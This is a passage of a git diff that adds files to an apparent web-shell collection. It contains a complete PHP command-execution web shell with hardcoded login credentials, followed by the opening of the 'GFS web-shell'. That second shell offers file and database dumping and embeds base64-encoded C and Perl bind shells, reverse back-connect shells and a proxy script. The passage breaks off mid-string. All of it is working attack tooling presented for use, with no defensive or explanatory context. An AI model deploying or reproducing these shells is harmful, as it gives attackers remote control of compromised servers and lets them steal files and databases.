z-J~W`eFLdSL|AxmAg?7S<lnKpCGZArOAN3#M6azc7=Y1t1k?YQmvu!i+o^BoUeirU
za=ev_1pm%4>*{0Q1l}P1`)Mj1@dB>_pvi4O2dn|le`(Mfz?ScV<cFISKUsz{>9e&Z
zlGd2~{ofj*$lyVL!z*;4(>!hv=5lw&gfF1{NG7u}9XM>HQ`ZVd{b%@p+>Cd0M(+r{
zA6sadB9WX<R+iw|KvvZTRQL*;XY$xVm&>k=vHNYWG`sjKAlU7Gx@|(W0TRi1Yb6PO
zH-Y;O0{ZxHzYyg6dQv^zP!9u6@8t(U(B|UnV)*CZ(eW$&nvUo-j^mFhU8*6Gd}uF`
zw8UPMRVdPgKOL6iIEQ)02U#vX9uwYvWz)0X0QPC4l6mK1Pl;r7Cg10ul@P$g-P{Ab
z!h%D?QRuArs4T<dK3~(IA=T$A_YMeX4<7cM(*q@eXNO26cs!_P*ih*6T;UKmAFK(i
zc&Ued)Z`(RZvyL0@SVrbsbUeTBau8r^CNs6DcOqAkO_XCK3?HroUg%hBz>$YQBjp|
z3j1B1crMihd)K6i+{SP}M};pP<8=d2<aPsmd|#6;LSK3DN4cREa6QmkReldxcz}x=
z5#otf1c&<u2YGpVMS2AUhj47pqQ-l`;lm=-3cUlmFLy@K0JC-K5#c+~up&?N_<a_p
z0jBycPrspA^fFXf#wQeuGvuZS2=+lE-rt<q9F2I2O(^ajBXLng%kxke{<(Q5H)Ag}
zJ$+n`7Z~grfkKo#Gv?<JQY3VH)Y4~A=7qcB@B!zyP{=bl(9JJM7Uty^>fwuGMtD^C
zzpOi3?yKZvnd|*!rYf1jmUC%I88gswy&oUKY$%FSS*5_svqN~zo;ju&o2#Rrrbhv_
zDdtK;P6@1Ao~n>-Q6b4C*Tf_(vc+wI>QbR@fnt^}SJy+p!Ts9rt%-n(H6*+YvuBO~
z*f-qG162XI#Fyk>uR@bcjE^YmuF{ArArBtR?XI|umtGUfOJ#rE<Db9reK`&FSvUXg
zUbm4SPew%mZl_3ziMTGeLYP~m7q`nk<xR3dNPHT*;ueWbT(i7097dYl9$Sm!0EMP8
zx8-o*UV$O<?)r{L1}a>u;RU{<NQIw1OJyMV&t!Z(XlY&*mmIhZ?jnl#co}BR9XVA5
zn!>qxdiw<^WVkk*MyAC4ctFCdobnzt@h*Fp=l-vztBxtZ&E+Wn>oCyffhZskM$d4o
YYN%^SBpJ#X%B??0B<CJBME~pm1FHyf`2YX_

literal 0
HcmV?d00001

diff --git a/xakep-shells/PHP/fuckphpshell.php.txt b/xakep-shells/PHP/fuckphpshell.php.txt
new file mode 100644
index 0000000..9e14e5d
--- /dev/null
+++ b/xakep-shells/PHP/fuckphpshell.php.txt
@@ -0,0 +1,322 @@
+<?php 
+
+
+error_reporting(0); 
+session_start(); 
+
+unset($user);    // Just in case ;-] 
+unset($pass); 
+
+if ($_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']); 
+
+$cache_lines = 1000; 
+$history_lines = 100;    
+$history_chars = 20;                            
+
+$user[] = "root";        $pass[] = md5("fuckyou");    
+$user[] = "user";      $pass[] = md5("fuckhacker"); 
+
+$alias = array( 
+    "la"    => "ls -la", 
+    "rf"    => "rm -f", 
+    "unbz2" => "tar -xjpf", 
+    "ungz"  => "tar -xzpf" 
+); 
+
+
+
+if (!$_SESSION['user']) { 
+
+    $pr_login = "Login:\n"; 
+    $pr_pass = "Password:\n"; 
+    $err = "Invalid login!\n\n"; 
+    $succ = "Warning! 
+Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n"; 
+
+    if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD 
+
+        $_SESSION['output'] .= $pr_pass; 
+
+        if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS 
+
+            $key = array_search($_SESSION['login'], $user); 
+
+            if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD 
+                $_SESSION['output'] .= $err; 
+                unset($_SESSION['login']); 
+                $prompt = $pr_login; 
+
+            } else { //..................................... SUCCESSFUL LOGIN 
+                $_SESSION['user'] = $_SESSION['login']; 
+                $_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1); 
+                $_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1); 
+                $_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1); 
+                $_SESSION['output'] .= $succ; 
+                $prompt = set_prompt(); 
+                unset($_SESSION['login']); 
+            } 
+
+        } else { //......................................... NO SUCH USERNAME 
+            $_SESSION['output'] .= $err; 
+            unset($_SESSION['login']); 
+            $prompt = $pr_login; 
+        } 
+
+    } else { //................................................ LOGIN PROCESS 
+
+        if (!$_SESSION['login'] && !$_POST['cmd']) $prompt = $pr_login; 
+
+        if (!$_SESSION['login'] && $_POST['cmd']) { 
+            $_SESSION['login'] = $_POST['cmd']; 
+            $_SESSION['output'] .= substr($pr_login, 0, -1) . " $_POST[cmd]\n"; 
+            $prompt = $pr_pass; 
+        } 
+    } 
+
+} else { //........................................................ LOGGED IN 
+
+
+
+                            /*=-- MEMBERS AREA --=*\ 
+                            \*=-- MEMBERS AREA --=*/ 
+
+
+    $prompt = set_prompt(); 
+
+    chdir($_SESSION['dir']); 
+
+    if ($_REQUEST['clear_hist']) //............................ CLEAR HISTORY 
+        $_SESSION['history'] = ""; 
+
+    if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']); 
+
+    if ($_POST['cmd']) { 
+
+        if (!in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY 
+            $hist_arr[] = $_POST['cmd']; 
+            $_SESSION['history'] = implode("\n", $hist_arr); 
+        } 
+
+        if (count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY 
+            $start = count($hist_arr) - $history_lines; 
+            $_SESSION['history'] = ""; 
+
+            for ($i = $start; $i < count($hist_arr); $i++) 
+                $_SESSION['history'] .= $hist_arr[$i] . "\n"; 
+
+            $_SESSION['history'] = substr($_SESSION['history'], 0, -1); 
+            $hist_arr = explode("\n", $_SESSION['history']); 
+        } 
+
+        $first_word = first_word($_POST['cmd']); 
+
+        if (array_key_exists($first_word, $alias)) { //. CHECKING FOR ALIASES 
+            $_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word)); 
+            $first_word = first_word($_POST['cmd']); 
+        } 
+
+        switch ($first_word) { 
+
+          case "clear": 
+            $_SESSION['output'] = ""; 
+            break; 
+
+          case "exit": 
+            session_destroy(); 
+            refresh(); 
+            break; 
+
+          case "cd": 
+            $_SESSION['output'] .= $prompt; 
+            $result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd"); 
+            $result = explode("\n", $result); 
+            $_SESSION['dir'] = $result[count($result) - 2]; 
+
+            if (count($result) > 2) //.............. WE HAVE AN ERROR MESSAGE 
+                $result[0] = "\n" . substr($result[0], strpos($result[0], "cd: ")) . "\n"; 
+            else $result[0] = "\n"; 
+
+            $prompt = set_prompt(); 
+            $_SESSION['output'] .= $_POST['cmd'] . $result[0]; 
+            break; 
+
+          default: 
+            $result = shell_exec($_POST['cmd'] . " 2>&1"); 
+
+            if (substr($result, -1) != "\n") $result .= "\n"; 
+            $_SESSION['output'] .= $prompt . $_POST['cmd'] . "\n" . $result; 
+
+            $rows = preg_match_all('/\n/', $_SESSION['output'], $arr); 
+            unset($arr); 
+
+            if ($rows > $cache_lines) { 
+                preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['output'], $out); 
+                $_SESSION['output'] = $out[0] . "\n"; 
+            } 
+        } 
+    } 
+} 
+
+
+
+                             /*=-- FUNCTIONS --=*\ 
+                             \*=-- FUNCTIONS --=*/ 
+
+
+function my_encode($str) { 
+    $str = str_replace("\\\\", "\\", $str); 
+    $str = str_replace("\\\"", "\"", $str); 
+    $str = str_replace("\\'", "'", $str); 
+
+    while (strpos($str, "  ") !== false) $str = str_replace("  ", " ", $str); 
+
+    return rtrim(ltrim($str)); 
+} 
+
+function set_prompt() { 
+    global $_SESSION; 
+
+    return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ "; 
+} 
+
+function first_word($str) { 
+    list($str) = preg_split('/[ ;]/', $str); 
+    return $str; 
+} 
+
+function refresh() { 
+    global $_SERVER; 
+
+    $self = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1); 
+    header("Location: $self"); 
+    die; 
+} 
+
+
+
+                             /*=-- HTML PAGE --=*\ 
+                             \*=-- HTML PAGE --=*/ 
+
+
+$out = substr(preg_replace('/<\/(textarea)/i', '&lt;/\1', $_SESSION['output']), 0, -1); 
+
+?><HTML> 
+<HEAD> 
+
+  <TITLE>Shell Commander</TITLE> 
+  <STYLE TYPE="text/css"><!-- 
+
+    INPUT, TEXTAREA, SELECT, OPTION, TD { 
+        color: #BBBBBB; 
+        background-color: #000000; 
+        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier; 
+    } 
+
+    TEXTAREA { 
+        overflow-y: auto; 
+        border-width: 0px; 
+        height: 100%; 
+        width: 100%; 
+        padding: 0px; 
+    } 
+
+    INPUT { 
+        border-width: 0px; 
+        height: 26px; 
+        width: 100%; 
+        padding-top: 5px; 
+    } 
+
+    SELECT, OPTION { 
+        color: #000000; 
+        background-color: #BBBBBB; 
+    } 
+
+    BODY { 
+        overflow-y: auto; 
+        margin: 0; 
+    } 
+
+  --></STYLE> 
+  <SCRIPT LANGUAGE="JavaScript"><!-- 
+
+hist_arr = new Array(); 
+
+<?php 
+
+foreach ($hist_arr as $key => $value) { 
+    $value = str_replace("\\", "\\\\", $value); 
+    $value = str_replace("\"", "\\\"", $value); 
+    echo "hist_arr[$key] = \"$value\";\n"; 
+} 
+
+?> 
+
+function parse_hist(key) { 
+    if (key < hist_arr.length) { 
+        if (key != "") { 
+            document.getElementById('input').value = hist_arr[key]; 
+            document.getElementById('input').focus(); 
+        } 
+    } else { 
+        window.location.href = "?clear_hist=1"; 
+    } 
+} 
+
+function input_focus() { 
+    document.getElementById('input').focus(); 
+} 
+
+function selection_to_clipboard() { // IE only! 
+    if (window.clipboardData && document.selection) 
+        window.clipboardData.setData("Text", document.selection.createRange().text); 
+} 
+
+if (window.clipboardData) 
+    document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false"); 
+
+  --></SCRIPT> 
+</HEAD> 
+<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0"> 
+<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%"> 
+<TR> 
+  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD> 
+</TR> 
+
+<TR> 
+  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%"> 
+    <TR> 
+    <FORM METHOD="POST" ACTION=""> 
+      <TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD> 
+      <TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD> 
+    </FORM><?php 
+
+if ($hist_arr) { 
+
+    ?><TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)"> 
+        <OPTION VALUE="">--- HISTORY</OPTION><?php 
+
+    for ($i = count($hist_arr) - 1; $i >= 0; $i--) { 
+
+        if (strlen($hist_arr[$i]) > $history_chars) $option = substr($hist_arr[$i], 0, $history_chars - 3) . "..."; 
+        else $option = $hist_arr[$i]; 
+
+        echo "<OPTION VALUE=\"" . $i . "\">$option</OPTION>"; 
+    } 
+
+      ?><OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php 
+
+} 
+
+  ?></TR> 
+
+  </TABLE></TD> 
+</TR> 
+</TABLE> 
+
+<SCRIPT LANGUAGE="JavaScript"><!-- 
+document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; 
+--></SCRIPT> 
+
+</BODY> 
+</HTML>
\ No newline at end of file
diff --git a/xakep-shells/PHP/gfs_sh.php.php.txt b/xakep-shells/PHP/gfs_sh.php.php.txt
new file mode 100644
index 0000000..6ac5420
--- /dev/null
+++ b/xakep-shells/PHP/gfs_sh.php.php.txt
@@ -0,0 +1,1575 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// ���������� ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //������ ����������� ������
+$mysql_stat=function_exists('mysql_connect');  //������� mysql
+$curl_on=function_exists('curl_version');      //������� cURL
+$dis_func=ini_get('disable_functions');        //�������������� �������
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
+bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
+lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
+BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
+VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
+CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
+7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
+ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
+XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
+c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
+iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
+R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
+29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
+ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
+QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
+Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
+QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
